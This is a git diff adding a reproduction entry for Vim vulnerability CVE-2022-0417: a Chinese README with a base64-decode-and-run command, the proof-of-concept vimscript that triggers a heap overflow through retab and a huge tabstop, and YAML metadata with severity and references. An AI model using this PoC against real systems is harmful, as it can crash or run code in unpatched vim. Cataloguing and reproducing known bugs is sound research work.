diff --git a/cve/vim/2022/CVE-2022-0417/README.md b/cve/vim/2022/CVE-2022-0417/README.md new file mode 100644 index 0000000000000000000000000000000000000000..100782435597146a6747e18c99476d4f653c306b --- /dev/null +++ b/cve/vim/2022/CVE-2022-0417/README.md @@ -0,0 +1,8 @@ +### 漏洞复现 +```shell +$ echo -ne "bm9ybTBvMDAwMDAwMDAwMDAwMDAwMDAwMDD/MJMwMDAKc2lsIW5vcm0WYxwwMAkwCmZ1IFJldGFi +KGcsbikKZXhlInJldCJhOm4KZW5kZgpjYWwgbCgiIixSZXRhYigwLDMpCnNlIHRhYnN0b3A9NTUw +MDAwMDAwMApjYWwgbCgiIixSZXRhYigwLDAp" | base64 -d > poc +$ vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized -c ":qa!" +``` +![](./png/CVE-2022-0417.png) \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-0417/png/CVE-2022-0417.png b/cve/vim/2022/CVE-2022-0417/png/CVE-2022-0417.png new file mode 100644 index 0000000000000000000000000000000000000000..c96750af334489a09b6c5bdf8deb3444c6892f16 Binary files /dev/null and b/cve/vim/2022/CVE-2022-0417/png/CVE-2022-0417.png differ diff --git a/cve/vim/2022/CVE-2022-0417/poc b/cve/vim/2022/CVE-2022-0417/poc new file mode 100644 index 0000000000000000000000000000000000000000..ce01ce153b1fd6339d3d8db9c1a4401b2fd8c5c2 --- /dev/null +++ b/cve/vim/2022/CVE-2022-0417/poc @@ -0,0 +1,8 @@ +norm0o000000000000000000000000 +sil!normc00 0 +fu Retab(g,n) +exe"ret"a:n +endf +cal l("",Retab(0,3) +se tabstop=5500000000 +cal l("",Retab(0,0) \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0417.yaml b/cve/vim/2022/yaml/CVE-2022-0417.yaml new file mode 100644 index 0000000000000000000000000000000000000000..30adb1b706450e3f12fa96b46a13062ae2e4bbb8 --- /dev/null +++ b/cve/vim/2022/yaml/CVE-2022-0417.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-0417 +source: https://huntr.dev/bounties/fc86bc8d-c866-4ade-8b7f-e49cec306d1a/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim存在安全漏洞,该漏洞源于这个漏洞允许攻击者可利用该漏洞输入一个特别制作的文件,导致崩溃或代码执行。 + scope-of-influence: + vim < 8.2.4245 + reference: + - https://github.com/vim/vim/commit/652dee448618589de5528a9e9a36995803f5557a + - https://nvd.nist.gov/vuln/detail/CVE-2022-0417 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-0417 + cwe-id: CWE-787,CWE-122 + cnvd-id: None + kve-id: None + tags: 崩溃,代码执行,cve2022 \ No newline at end of file